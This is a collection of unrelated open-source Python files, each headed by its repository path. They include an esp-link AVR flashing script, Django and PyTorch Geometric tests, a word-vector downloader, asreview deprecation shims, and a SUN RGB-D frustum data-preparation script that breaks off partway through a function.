def things_to_ids(self, things: Sequence[Any]) -> np.ndarray:
"""
Vectorized version of :func:`thing_to_id` for translating multiple things
at once.
:param things: Multiple things to be translated to IDs. Must be already
in the table's set of things.
:returns: A numpy array of the same integers that :func:`thing_to_id` would
return.
"""
ret = np.empty(len(things), dtype=np.int32)
for i in range(len(things)):
ret[i] = self.thing_to_id(things[i])
return ret
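# Hedged usage sketch (not part of the original module): ThingTable is
# abstract, so the toy string subclass below only illustrates the interface;
# the real package provides StringTable for this purpose.
if __name__ == "__main__":
    class _ToyStringTable(ThingTable):
        def size_of_thing(self, thing: Any) -> int:
            return len(thing.encode("utf-8"))

        def type_of_thing(self) -> Type:
            return str

    table = _ToyStringTable()
    ids = table.maybe_add_things(["foo", "bar", "foo"])
    print(ids.tolist())             # [0, 1, 0] -- duplicate things share an ID
    print(table.id_to_thing(1))     # 'bar'
    print(table.thing_to_id(None))  # -1 (ThingTable.NONE_ID)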
|
flash2560.py
|
kaleidoscopeit/esp-link
| 2,522 |
63482
|
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# <NAME> wrote this file. As long as you retain
# this notice you can do whatever you want with this stuff. If we meet some day,
# and you think this stuff is worth it, you can buy me a beer in return.
# ----------------------------------------------------------------------------
import sys
import re
import requests
import platform # For getting the operating system name
import subprocess # For executing a shell command
import os
import time
ip_regex = "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
def main(argv):
print("--- flash2560 - Created by <NAME> ---")
hostname = "192.168.4.1"
input_file = "none"
# Handle the command line arguments
for index, arg in enumerate(argv):
if arg == "-h" or arg == "--help":
print_help()
sys.exit(0)
elif arg == "-H" or arg == "--hostname":
if index + 1 < len(argv) and re.search(ip_regex, argv[index + 1]):
hostname = argv[index + 1]
if not ping(hostname):
print("IP is not reachable:")
sys.exit(2)
else:
print("IP address is not right")
print_help()
sys.exit(1)
elif arg == "-f" or arg == "--file":
if index + 1 < len(argv) and os.path.isfile(argv[index + 1]):
input_file = argv[index + 1]
else:
print("Can't open file")
print_help()
sys.exit(3)
if input_file == "none":
print("No input file")
print_help()
sys.exit(4)
response = requests.post('http://' + hostname + '/pgmmega/sync')
# ------------ GET AVR in SYNC ----------------------------------------
if response.status_code != 204:
print("Failed to reset the AVR (HTML ERROR: " + response.status_code + ")")
sys.exit(5)
while True:
response = requests.get('http://' + hostname + '/pgmmega/sync')
if "SYNC" in response.content.decode('ASCII'):
print(response.content)
break
elif "NOT READY" not in response.content.decode('ASCII'):
print("Could not get in Sync with AVR")
sys.exit(7)
time.sleep(0.1)
# -------------- Upload HEX file -----------------------------------------
hex_file = open(input_file).read()
response = requests.post('http://' + hostname + '/pgmmega/upload', data=hex_file, timeout=20.0)
if "Success" in response.content.decode('ASCII'):
print("+++++ Success :) ++++++")
else:
print("Failed :(")
sys.exit(8)
    # Reset the AVR to work around a bootloader bug where the program does not start immediately
time.sleep(0.1)
requests.post('http://' + hostname + '/console/reset')
sys.exit(0)
def print_help():
print('\n')
print("Usage: ")
print("flash2560.py -H <hostname> -f <hex_file>")
print("\nExample:")
print("flash2560.py -H 192.168.4.1 -f Sketch.hex")
def ping(host):
param = '-n' if platform.system().lower() == 'windows' else '-c'
command = ['ping', param, '1', host]
output = open(os.devnull, 'w')
return subprocess.call(command, stdout=output) == 0
if __name__ == "__main__":
main(sys.argv[1:])
|
openbook_categories/serializers.py
|
TamaraAbells/okuna-api
| 164 |
63484
|
from rest_framework import serializers
from openbook_categories.models import Category
class GetCategoriesCategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = (
'id',
'name',
'title',
'description',
'avatar',
'color'
)
|
lightnlp/sl/ner/utils/convert.py
|
CNLPT/lightNLP
| 889 |
63490
|
def iob_ranges(words, tags):
"""
IOB -> Ranges
"""
assert len(words) == len(tags)
ranges = []
def check_if_closing_range():
if i == len(tags) - 1 or tags[i + 1].split('_')[0] == 'O':
ranges.append({
'entity': ''.join(words[begin: i + 1]),
'type': temp_type,
'start': begin,
'end': i
})
for i, tag in enumerate(tags):
if tag.split('_')[0] == 'O':
pass
elif tag.split('_')[0] == 'B':
begin = i
temp_type = tag.split('_')[1]
check_if_closing_range()
elif tag.split('_')[0] == 'I':
check_if_closing_range()
return ranges
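# Hedged usage sketch (not part of the original module): the tag scheme uses
# '_' as the separator (e.g. 'B_PER'), matching the split('_') calls above.
# The sentence below is illustrative only.
if __name__ == "__main__":
    words = ['张', '三', '在', '北', '京']
    tags = ['B_PER', 'I_PER', 'O', 'B_LOC', 'I_LOC']
    print(iob_ranges(words, tags))
    # [{'entity': '张三', 'type': 'PER', 'start': 0, 'end': 1},
    #  {'entity': '北京', 'type': 'LOC', 'start': 3, 'end': 4}]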
|
CGI/simple-server-with-different-languages/cgi-bin/download.py
|
whitmans-max/python-examples
| 140 |
63557
|
<filename>CGI/simple-server-with-different-languages/cgi-bin/download.py
#!/usr/bin/env python
import os
import sys
fullpath = 'images/normal.png'
filename = 'hello_world.png'
# headers
print 'Content-Type: application/octet-stream; name="%s"' % filename
print 'Content-Disposition: attachment; filename="%s"' % filename
print "Content-Length: " + str(os.stat(fullpath).st_size)
print # empty line between headers and body
#sys.stdout.flush() # send header faster
try:
# body
with open(fullpath, 'rb') as fo:
        sys.stdout.write(fo.read())  # write raw bytes; print would append a newline and break Content-Length
except Exception as e:
print 'Content-type:text/html'
print # empty line between headers and body
print 'Exception:', e
|
foreman/data_refinery_foreman/foreman/management/commands/test_import_external_sample_attributes.py
|
AlexsLemonade/refinebio
| 106 |
63570
|
from unittest.mock import patch
from django.test import TestCase
import vcr
from data_refinery_common.models import (
Contribution,
Experiment,
ExperimentSampleAssociation,
OntologyTerm,
Sample,
SampleAttribute,
)
from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import (
Command,
import_metadata,
import_sample_attributes,
)
TEST_METADATA = "/home/user/data_store/externally_supplied_metadata/test_data/metadata.json"
class ImportExternalSampleAttributesTestCase(TestCase):
def setUp(self):
experiment = Experiment()
experiment.accession_code = "GSE000"
experiment.alternate_accession_code = "E-GEOD-000"
experiment.title = "NONONONO"
experiment.description = "Boooooourns. Wasabi."
experiment.technology = "RNA-SEQ"
experiment.save()
self.experiment = experiment
# Create some samples to attach metadata to
sample = Sample()
sample.accession_code = "SRR123"
sample.technology = "RNA-SEQ"
sample.source_database = "SRA"
sample.title = "Not important"
sample.save()
experiment_sample_association = ExperimentSampleAssociation()
experiment_sample_association.sample = sample
experiment_sample_association.experiment = experiment
experiment_sample_association.save()
sample2 = Sample()
sample2.accession_code = "SRR456"
sample2.technology = "RNA-SEQ"
sample2.source_database = "SRA"
sample2.title = "Not important"
sample2.save()
experiment_sample_association = ExperimentSampleAssociation()
experiment_sample_association.sample = sample2
experiment_sample_association.experiment = experiment
experiment_sample_association.save()
# Create the ontology terms I'm using in the tests
name = OntologyTerm()
name.ontology_term = "PATO:0000122"
name.human_readable_name = "length"
name.save()
unit = OntologyTerm()
unit.ontology_term = "UO:0010012"
unit.human_readable_name = "thou"
unit.save()
contribution = Contribution()
contribution.source_name = "refinebio_tests"
contribution.methods_url = "ccdatalab.org"
contribution.save()
self.contribution = contribution
#
# Test import_sample_attributes()
#
def test_skip_unknown_sample(self):
"""Make sure that if someone has metadata for a sample that we haven't
surveyed then we just do nothing"""
METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}]
import_sample_attributes("SRR789", METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 0)
def test_import_invalid_ontology_term(self):
METADATA = [{"PATO:0000122": {"value": 25, "unit": "thou"}}]
self.assertRaises(
ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution
)
METADATA = [{"length": {"value": 25, "unit": "UO:0010012"}}]
self.assertRaises(
ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution
)
def test_import_valid_sample_attributes(self):
METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}]
import_sample_attributes("SRR123", METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata
self.assertEqual(
contributed_metadata[self.contribution.source_name]["length"],
{"unit": "thou", "value": 25},
)
#
# Test import_metadata()
#
def test_import_valid_metadata(self):
METADATA = [
{
"sample_accession": "SRR123",
"attributes": [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}],
}
]
import_metadata(METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata
self.assertEqual(
contributed_metadata[self.contribution.source_name]["length"],
{"unit": "thou", "value": 25},
)
#
# End-to-end test
#
@vcr.use_cassette("/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml")
def test_management_command(self):
sample = Sample()
sample.accession_code = "DRR001173"
sample.technology = "RNA-SEQ"
sample.source_database = "SRA"
sample.title = "Not important"
sample.save()
command = Command()
SOURCE_NAME = "refinebio_tests"
command.handle(file=TEST_METADATA, source_name=SOURCE_NAME, methods_url="ccdatalab.org")
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = sample.contributed_metadata
self.assertEqual(
set(contributed_metadata[SOURCE_NAME]["biological sex"].keys()),
{"value", "confidence"},
)
self.assertEqual(
contributed_metadata[SOURCE_NAME]["biological sex"]["value"].human_readable_name,
"female",
)
self.assertAlmostEqual(
contributed_metadata[SOURCE_NAME]["biological sex"]["confidence"], 0.7856624891880539
)
|
flags/tests/test_management_commands_enable_flag.py
|
mdunc/django-flags
| 142 |
63660
|
from io import StringIO
from django.core.management import call_command
from django.core.management.base import CommandError
from django.test import TestCase
from flags.state import flag_enabled
class EnableFlagTestCase(TestCase):
def test_enable_flag(self):
out = StringIO()
self.assertFalse(flag_enabled("DB_FLAG"))
call_command("enable_flag", "DB_FLAG", stdout=out)
self.assertTrue(flag_enabled("DB_FLAG"))
self.assertIn("Successfully enabled", out.getvalue())
def test_enable_flag_non_existent_flag(self):
with self.assertRaises(CommandError):
call_command("enable_flag", "FLAG_DOES_NOT_EXIST")
|
test/loader/test_link_neighbor_loader.py
|
NucciTheBoss/pytorch_geometric
| 2,350 |
63665
|
<filename>test/loader/test_link_neighbor_loader.py
import pytest
import torch
from torch_geometric.data import Data, HeteroData
from torch_geometric.loader import LinkNeighborLoader
def get_edge_index(num_src_nodes, num_dst_nodes, num_edges):
row = torch.randint(num_src_nodes, (num_edges, ), dtype=torch.long)
col = torch.randint(num_dst_nodes, (num_edges, ), dtype=torch.long)
return torch.stack([row, col], dim=0)
def unique_edge_pairs(edge_index):
return set(map(tuple, edge_index.t().tolist()))
@pytest.mark.parametrize('directed', [True, False])
@pytest.mark.parametrize('neg_sampling_ratio', [0.0, 1.0])
def test_homogeneous_link_neighbor_loader(directed, neg_sampling_ratio):
torch.manual_seed(12345)
pos_edge_index = get_edge_index(100, 50, 500)
neg_edge_index = get_edge_index(100, 50, 500)
neg_edge_index[1, :] += 50
edge_label_index = torch.cat([pos_edge_index, neg_edge_index], dim=-1)
edge_label = torch.cat([torch.ones(500), torch.zeros(500)], dim=0)
data = Data()
data.edge_index = pos_edge_index
data.x = torch.arange(100)
data.edge_attr = torch.arange(500)
loader = LinkNeighborLoader(
data,
num_neighbors=[-1] * 2,
batch_size=20,
edge_label_index=edge_label_index,
edge_label=edge_label if neg_sampling_ratio == 0.0 else None,
directed=directed,
neg_sampling_ratio=neg_sampling_ratio,
shuffle=True,
)
assert str(loader) == 'LinkNeighborLoader()'
assert len(loader) == 1000 / 20
for batch in loader:
assert isinstance(batch, Data)
assert len(batch) == 5
assert batch.x.size(0) <= 100
assert batch.x.min() >= 0 and batch.x.max() < 100
assert batch.edge_index.min() >= 0
assert batch.edge_index.max() < batch.num_nodes
assert batch.edge_attr.min() >= 0
assert batch.edge_attr.max() < 500
if neg_sampling_ratio == 0.0:
assert batch.edge_label_index.size(1) == 20
# Assert positive samples are present in the original graph:
edge_index = unique_edge_pairs(batch.edge_index)
edge_label_index = batch.edge_label_index[:, batch.edge_label == 1]
edge_label_index = unique_edge_pairs(edge_label_index)
assert len(edge_index | edge_label_index) == len(edge_index)
# Assert negative samples are not present in the original graph:
edge_index = unique_edge_pairs(batch.edge_index)
edge_label_index = batch.edge_label_index[:, batch.edge_label == 0]
edge_label_index = unique_edge_pairs(edge_label_index)
assert len(edge_index & edge_label_index) == 0
else:
assert batch.edge_label_index.size(1) == 40
assert torch.all(batch.edge_label[:20] == 1)
assert torch.all(batch.edge_label[20:] == 0)
@pytest.mark.parametrize('directed', [True, False])
@pytest.mark.parametrize('neg_sampling_ratio', [0.0, 1.0])
def test_heterogeneous_link_neighbor_loader(directed, neg_sampling_ratio):
torch.manual_seed(12345)
data = HeteroData()
data['paper'].x = torch.arange(100)
data['author'].x = torch.arange(100, 300)
data['paper', 'paper'].edge_index = get_edge_index(100, 100, 500)
data['paper', 'paper'].edge_attr = torch.arange(500)
data['paper', 'author'].edge_index = get_edge_index(100, 200, 1000)
data['paper', 'author'].edge_attr = torch.arange(500, 1500)
data['author', 'paper'].edge_index = get_edge_index(200, 100, 1000)
data['author', 'paper'].edge_attr = torch.arange(1500, 2500)
loader = LinkNeighborLoader(
data,
num_neighbors=[-1] * 2,
edge_label_index=('paper', 'author'),
batch_size=20,
directed=directed,
neg_sampling_ratio=neg_sampling_ratio,
shuffle=True,
)
assert str(loader) == 'LinkNeighborLoader()'
assert len(loader) == 1000 / 20
for batch in loader:
assert isinstance(batch, HeteroData)
if neg_sampling_ratio == 0.0:
assert len(batch) == 4
# Assert positive samples are present in the original graph:
edge_index = unique_edge_pairs(batch['paper', 'author'].edge_index)
edge_label_index = batch['paper', 'author'].edge_label_index
edge_label_index = unique_edge_pairs(edge_label_index)
assert len(edge_index | edge_label_index) == len(edge_index)
else:
assert len(batch) == 5
assert batch['paper', 'author'].edge_label_index.size(1) == 40
assert torch.all(batch['paper', 'author'].edge_label[:20] == 1)
assert torch.all(batch['paper', 'author'].edge_label[20:] == 0)
@pytest.mark.parametrize('directed', [True, False])
def test_heterogeneous_link_neighbor_loader_loop(directed):
torch.manual_seed(12345)
data = HeteroData()
data['paper'].x = torch.arange(100)
data['author'].x = torch.arange(100, 300)
data['paper', 'paper'].edge_index = get_edge_index(100, 100, 500)
data['paper', 'author'].edge_index = get_edge_index(100, 200, 1000)
data['author', 'paper'].edge_index = get_edge_index(200, 100, 1000)
loader = LinkNeighborLoader(data, num_neighbors=[-1] * 2,
edge_label_index=('paper', 'paper'),
batch_size=20, directed=directed)
for batch in loader:
assert batch['paper'].x.size(0) <= 100
assert batch['paper'].x.min() >= 0 and batch['paper'].x.max() < 100
# Assert positive samples are present in the original graph:
edge_index = unique_edge_pairs(batch['paper', 'paper'].edge_index)
edge_label_index = batch['paper', 'paper'].edge_label_index
edge_label_index = unique_edge_pairs(edge_label_index)
assert len(edge_index | edge_label_index) == len(edge_index)
def test_link_neighbor_loader_edge_label():
torch.manual_seed(12345)
edge_index = get_edge_index(100, 100, 500)
data = Data(edge_index=edge_index, x=torch.arange(100))
loader = LinkNeighborLoader(
data,
num_neighbors=[-1] * 2,
batch_size=10,
neg_sampling_ratio=1.0,
)
for batch in loader:
assert batch.edge_label.dtype == torch.float
assert torch.all(batch.edge_label[:10] == 1.0)
assert torch.all(batch.edge_label[10:] == 0.0)
loader = LinkNeighborLoader(
data,
num_neighbors=[-1] * 2,
batch_size=10,
edge_label=torch.ones(500, dtype=torch.long),
neg_sampling_ratio=1.0,
)
for batch in loader:
assert batch.edge_label.dtype == torch.long
assert torch.all(batch.edge_label[:10] == 2)
assert torch.all(batch.edge_label[10:] == 0)
|
chakin/downloader.py
|
massongit/chakin
| 334 |
63675
|
# -*- coding: utf-8 -*-
import os
import pandas as pd
from progressbar import Bar, ETA, FileTransferSpeed, ProgressBar, Percentage, RotatingMarker
from six.moves.urllib.request import urlretrieve
def load_datasets(path=os.path.join(os.path.dirname(__file__), 'datasets.csv')):
datasets = pd.read_csv(path)
return datasets
def download(number=-1, name="", save_dir='./'):
"""Download pre-trained word vector
:param number: integer, default ``None``
:param save_dir: str, default './'
:return: file path for downloaded file
"""
df = load_datasets()
if number > -1:
row = df.iloc[[number]]
elif name:
row = df.loc[df["Name"] == name]
url = ''.join(row.URL)
if not url:
print('The word vector you specified was not found. Please specify correct name.')
widgets = ['Test: ', Percentage(), ' ', Bar(marker=RotatingMarker()), ' ', ETA(), ' ', FileTransferSpeed()]
pbar = ProgressBar(widgets=widgets)
def dlProgress(count, blockSize, totalSize):
if pbar.max_value is None:
pbar.max_value = totalSize
pbar.start()
pbar.update(min(count * blockSize, totalSize))
file_name = url.split('/')[-1]
if not os.path.exists(save_dir):
os.makedirs(save_dir)
save_path = os.path.join(save_dir, file_name)
path, _ = urlretrieve(url, save_path, reporthook=dlProgress)
pbar.finish()
return path
def search(lang=''):
"""Search pre-trained word vectors by their language
:param lang: str, default ''
:return: None
print search result as pandas DataFrame
"""
df = load_datasets()
if lang == '':
print(df[['Name', 'Dimension', 'Corpus', 'VocabularySize', 'Method', 'Language', 'Author']])
else:
rows = df[df.Language==lang]
print(rows[['Name', 'Dimension', 'Corpus', 'VocabularySize', 'Method', 'Language', 'Author']])
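# Hedged usage sketch (not part of the original module): list the vectors
# available for a language, then download one by name. The name passed to
# download() must match an entry printed by search(); 'fastText(en)' is used
# here only as an example. Running this performs a real (large) download.
if __name__ == '__main__':
    search(lang='English')
    path = download(name='fastText(en)', save_dir='./')
    print('Downloaded to', path)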
|
script/build_day_stat.py
|
khamdamoff/daysandbox_bot
| 101 |
63689
|
<gh_stars>100-1000
from collections import Counter
from datetime import datetime, timedelta
from database import connect_db
def setup_arg_parser(parser):
parser.add_argument('days_ago', type=int, default=0)
def get_chat_id(event):
return event.get('chat_id', event['chat']['id'])
def main(days_ago, **kwargs):
db = connect_db()
day = datetime.utcnow().replace(
hour=0, minute=0, second=0, microsecond=0
)
for x in range(days_ago + 1):
start = day - timedelta(days=x)
end = start + timedelta(days=1)
query = {
'type': 'delete_msg',
'date': {
'$gte': start,
'$lt': end,
},
}
del_count = 0
chat_reg = set()
for event in db.event.find(query):
del_count += 1
chat_reg.add(get_chat_id(event))
db.day_stat.find_one_and_update(
{'date': start},
{'$set': {
'delete_msg': del_count,
'chat': len(chat_reg),
}},
upsert=True,
)
print('Date: %s' % start)
print(' * delete_msg: %d' % del_count)
print(' * chat: %d' % len(chat_reg))
|
asreview/query_strategies.py
|
DominiqueMaciejewski/asreview
| 280 |
63702
|
# Copyright 2019-2020 The ASReview Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from asreview.models.deprecated import _moved_warning
from asreview.models.query.max import MaxQuery as _MaxQuery
from asreview.models.query.mixed import MixedQuery as _MixedQuery
from asreview.models.query.uncertainty import UncertaintyQuery as _UncertaintyQuery
from asreview.models.query.random import RandomQuery as _RandomQuery
from asreview.models.query.cluster import ClusterQuery as _ClusterQuery
from asreview.models.query.utils import get_query_model as _get_query_model
from asreview.models.query.utils import get_query_class as _get_query_class
from asreview.models.query.utils import list_query_strategies as _list_query_strategies
"""Deprecated, will be removed in version 1.0"""
MaxQuery = _moved_warning(
_MaxQuery, "asreview.models.query.MaxQuery",
"asreview.query_strategies.MaxQuery")
MixedQuery = _moved_warning(
_MixedQuery, "asreview.models.query.MixedQuery",
"asreview.query_strategies.MixedQuery")
UncertaintyQuery = _moved_warning(
_UncertaintyQuery, "asreview.models.query.UncertaintyQuery",
"asreview.query_strategies.UncertaintyQuery")
RandomQuery = _moved_warning(
_RandomQuery, "asreview.models.query.RandomQuery",
"asreview.query_strategies.RandomQuery")
ClusterQuery = _moved_warning(
_ClusterQuery, "asreview.models.query.ClusterQuery",
"asreview.query_strategies.ClusterQuery")
get_query_model = _moved_warning(
_get_query_model, "asreview.models.query.get_query_model",
"asreview.query_strategies.get_query_model")
get_query_class = _moved_warning(
_get_query_class, "asreview.models.query.get_query_class",
"asreview.query_strategies.get_query_class")
list_query_strategies = _moved_warning(
_list_query_strategies, "asreview.models.query.list_query_strategies",
"asreview.query_strategies.list_query_strategies")
|
sunrgbd/prepare_data.py
|
lemontyc/frustum-convnet
| 247 |
63710
|
''' Helper class and functions for loading SUN RGB-D objects
Author: <NAME>
Date: October 2017
Modified by <NAME>
'''
import os
import sys
import numpy as np
import pickle
import argparse
from PIL import Image
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
import sunrgbd_utils as utils
from sunrgbd_object import sunrgbd_object
from sunrgbd_utils import random_shift_box2d, extract_pc_in_box3d
def ravel_hash(coord):
assert coord.ndim == 2
coord -= coord.min(0)
coord_max = coord.max(0) + 1
keys = np.zeros(coord.shape[0], dtype=np.int64)
for i in range(coord.shape[1] - 1):
keys += coord[:, i]
keys *= coord_max[i + 1]
keys += coord[:, -1]
return keys
def down_sample(x, voxel_size=(0.05, )):
if isinstance(voxel_size, float):
voxel_size = (voxel_size, )
if len(voxel_size) == 1:
voxel_size = voxel_size * 3
voxel_size = np.array(voxel_size, dtype=np.float32)
voxel_index = np.floor(x / voxel_size).astype(np.int64, copy=False)
hash_keys = ravel_hash(voxel_index)
_, idx = np.unique(hash_keys, return_index=True)
return idx
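def _down_sample_example():
    # Hedged usage sketch (not part of the original script): illustrates the
    # voxel down-sampling above. With a voxel size of 0.5 the first two points
    # fall into the same voxel, so only indices 0 and 2 survive. Values are
    # illustrative only.
    pts = np.array([[0.0, 0.0, 0.0], [0.1, 0.1, 0.1], [1.0, 1.0, 1.0]])
    idx = down_sample(pts, 0.5)
    print(idx)  # -> [0 2]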
def get_box3d_dim_statistics(my_sunrgbd_dir, idx_filename, type_whitelist):
dataset = sunrgbd_object(my_sunrgbd_dir)
dimension_list = []
type_list = []
data_idx_list = [int(line.rstrip()) for line in open(idx_filename)]
for data_idx in data_idx_list:
print('------------- ', data_idx)
objects = dataset.get_label_objects(data_idx)
for obj_idx in range(len(objects)):
obj = objects[obj_idx]
if obj.classname not in type_whitelist:
continue
dimension_list.append(np.array([obj.l, obj.w, obj.h]))
type_list.append(obj.classname)
print("number of objects: {} ".format(len(type_list)))
print("categories:", list(sorted(type_whitelist)))
# Get average box size for different categories
for class_type in sorted(set(type_list)):
cnt = 0
box3d_list = []
for i in range(len(dimension_list)):
if type_list[i] == class_type:
cnt += 1
box3d_list.append(dimension_list[i])
median_box3d = np.median(box3d_list, 0)
print("\'%s\': np.array([%f,%f,%f])," %
(class_type, median_box3d[0] * 2, median_box3d[1] * 2, median_box3d[2] * 2))
def read_det_file(det_file):
id_list = []
type_list = []
prob_list = []
box2d_list = []
# data_idx, type_list, prob, box2d
with open(det_file, 'rt') as f:
for line in f:
t = line.rstrip().split(" ")
id_list.append(int(t[0]))
type_list.append(t[1])
prob_list.append(float(t[2]))
box2d_list.append(np.array([float(t[i]) for i in range(3, 7)]))
return id_list, type_list, box2d_list, prob_list
def read_det_pkl_file(det_file):
classes = [
'__background__', 'bathtub', 'bed', 'bookshelf', 'box', 'chair', 'counter', 'desk', 'door', 'dresser',
'garbage_bin', 'lamp', 'monitor', 'night_stand', 'pillow', 'sink', 'sofa', 'table', 'tv', 'toilet'
]
with open(det_file, 'rb') as f:
dets = pickle.load(f)
num_classes = len(dets)
num_images = len(dets[0])
id_list = []
type_list = []
prob_list = []
box2d_list = []
for i in range(num_images):
for c in range(1, num_classes):
det = dets[c][i]
for j in range(len(det)):
id_list.append((i + 1))
type_list.append(classes[c])
prob_list.append(det[j][4])
box2d_list.append(det[j][:4])
return id_list, type_list, box2d_list, prob_list
def extract_frustum_data(sunrgbd_dir,
idx_filename,
split,
output_filename,
type_whitelist,
perturb_box2d=False,
augmentX=1,
with_down_sample=False):
dataset = sunrgbd_object(sunrgbd_dir, split)
data_idx_list = [int(line.rstrip()) for line in open(idx_filename)]
id_list = [] # int number
box2d_list = [] # [xmin,ymin,xmax,ymax]
box3d_list = [] # (8,3) array in upright depth coord
input_list = [] # channel number = 6, xyz,rgb in upright depth coord
label_list = [] # 1 for roi object, 0 for clutter
type_list = [] # string e.g. bed
heading_list = [] # face of object angle, radius of clockwise angle from positive x axis in upright camera coord
box3d_size_list = [] # array of l,w,h
frustum_angle_list = [] # angle of 2d box center from pos x-axis (clockwise)
img_coord_list = []
calib_K_list = []
calib_R_list = []
pos_cnt = 0
all_cnt = 0
for data_idx in data_idx_list:
print('------------- ', data_idx)
calib = dataset.get_calibration(data_idx)
objects = dataset.get_label_objects(data_idx)
pc_upright_depth = dataset.get_pointcloud(data_idx)
pc_upright_camera = np.zeros_like(pc_upright_depth)
pc_upright_camera[:, 0:3] = calib.project_upright_depth_to_upright_camera(pc_upright_depth[:, 0:3])
pc_upright_camera[:, 3:] = pc_upright_depth[:, 3:]
if with_down_sample:
idx = down_sample(pc_upright_camera[:, :3], 0.01)
# print(len(idx), len(pc_upright_camera))
pc_upright_camera = pc_upright_camera[idx]
pc_upright_depth = pc_upright_depth[idx]
# img = dataset.get_image(data_idx)
# img_height, img_width, img_channel = img.shape
pc_image_coord, _ = calib.project_upright_depth_to_image(pc_upright_depth)
for obj_idx in range(len(objects)):
obj = objects[obj_idx]
if obj.classname not in type_whitelist:
continue
# 2D BOX: Get pts rect backprojected
box2d = obj.box2d
for _ in range(augmentX):
if perturb_box2d:
xmin, ymin, xmax, ymax = random_shift_box2d(box2d)
# print(xmin,ymin,xmax,ymax)
else:
xmin, ymin, xmax, ymax = box2d
box_fov_inds = (pc_image_coord[:, 0] < xmax) & (pc_image_coord[:, 0] >= xmin) & (
pc_image_coord[:, 1] < ymax) & (pc_image_coord[:, 1] >= ymin)
coord_in_box_fov = pc_image_coord[box_fov_inds, :]
pc_in_box_fov = pc_upright_camera[box_fov_inds, :]
# Get frustum angle (according to center pixel in 2D BOX)
box2d_center = np.array([(xmin + xmax) / 2.0, (ymin + ymax) / 2.0])
uvdepth = np.zeros((1, 3))
uvdepth[0, 0:2] = box2d_center
uvdepth[0, 2] = 20 # some random depth
box2d_center_upright_camera = calib.project_image_to_upright_camera(uvdepth)
# print('UVdepth, center in upright camera: ', uvdepth, box2d_center_upright_camera)
frustum_angle = -1 * np.arctan2(
box2d_center_upright_camera[0, 2],
box2d_center_upright_camera[0, 0]) # angle as to positive x-axis as in the Zoox paper
# print('Frustum angle: ', frustum_angle)
# 3D BOX: Get pts velo in 3d box
box3d_pts_2d, box3d_pts_3d = utils.compute_box_3d(obj, calib)
box3d_pts_3d = calib.project_upright_depth_to_upright_camera(box3d_pts_3d)
try:
_, inds = extract_pc_in_box3d(pc_in_box_fov, box3d_pts_3d)
except Exception as e:
print(e)
continue
label = np.zeros((pc_in_box_fov.shape[0]))
label[inds] = 1
box3d_size = np.array([2 * obj.l, 2 * obj.w, 2 * obj.h])
# Subsample points..
num_point = pc_in_box_fov.shape[0]
if num_point > 2048:
choice = np.random.choice(pc_in_box_fov.shape[0], 2048, replace=False)
coord_in_box_fov = coord_in_box_fov[choice, :]
pc_in_box_fov = pc_in_box_fov[choice, :]
label = label[choice]
# Reject object with too few points
if np.sum(label) < 5:
continue
id_list.append(data_idx)
box2d_list.append(np.array([xmin, ymin, xmax, ymax], dtype=np.float32))
box3d_list.append(box3d_pts_3d)
input_list.append(pc_in_box_fov.astype(np.float32))
                label_list.append(label.astype(bool))  # np.bool is removed in recent NumPy versions
type_list.append(obj.classname)
heading_list.append(obj.heading_angle)
box3d_size_list.append(box3d_size)
frustum_angle_list.append(frustum_angle)
img_coord_list.append(coord_in_box_fov.astype(np.float32))
calib_K_list.append(calib.K)
calib_R_list.append(calib.Rtilt)
# collect statistics
pos_cnt += np.sum(label)
all_cnt += pc_in_box_fov.shape[0]
print('Average pos ratio: ', pos_cnt / float(all_cnt))
print('Average npoints: ', float(all_cnt) / len(id_list))
data_dict = {
'id': id_list,
'box2d': box2d_list,
'box3d': box3d_list,
'box3d_size': box3d_size_list,
'box3d_heading': heading_list,
'type': type_list,
'input': input_list,
'frustum_angle': frustum_angle_list,
'label': label_list,
'calib_K': calib_K_list,
'calib_R': calib_R_list,
# 'image_coord': img_coord_list,
}
with open(output_filename, 'wb') as f:
pickle.dump(data_dict, f, -1)
print("save in {}".format(output_filename))
def extract_frustum_data_from_rgb_detection(sunrgbd_dir,
det_file,
split,
output_filename,
type_whitelist,
valid_id_list=None,
with_down_sample=False):
dataset = sunrgbd_object(sunrgbd_dir, split)
if det_file.split('.')[-1] == 'txt':
det_id_list, det_type_list, det_box2d_list, det_prob_list = read_det_file(det_file)
else:
det_id_list, det_type_list, det_box2d_list, det_prob_list = read_det_pkl_file(det_file)
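# Per-scene cache: consecutive detections from the same scene reuse the calibration,
# point cloud and image-plane projection instead of reloading them.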
cache_id = -1
cache = None
id_list = []
type_list = []
box2d_list = []
prob_list = []
input_list = []  # frustum point cloud per 2D box: xyz in upright camera coord plus the remaining channels carried over from the depth point cloud
frustum_angle_list = [] # angle of 2d box center from pos x-axis
img_coord_list = []
calib_K_list = []
calib_R_list = []
for det_idx in range(len(det_id_list)):
data_idx = det_id_list[det_idx]
if valid_id_list is not None and data_idx not in valid_id_list:
continue
if det_type_list[det_idx] not in type_whitelist:
continue
